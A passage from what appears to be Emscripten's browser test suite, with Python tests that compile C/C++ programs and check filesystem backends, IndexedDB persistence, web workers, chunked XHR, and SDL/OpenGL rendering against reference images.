self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(Path('sub/file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(Path('subdir/file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': ([False],),
# Enabling FULL_ES3 also enables ES2 automatically
'proxy': ([True],)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-s', 'FULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook/CH02_HelloTriangle.png')),
# (Path('glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook/CH09_TextureWrap.png')),
# (Path('glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook/CH09_SimpleTexture2D.png')),
(Path('glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook/CH10_MultiTexture.png')),
(Path('glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook/Common'),
test_file('glbook/Common/esUtil.c'),
test_file('glbook/Common/esShader.c'),
test_file('glbook/Common/esShapes.c'),
test_file('glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-s', 'EXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"])
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0'],
]:
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
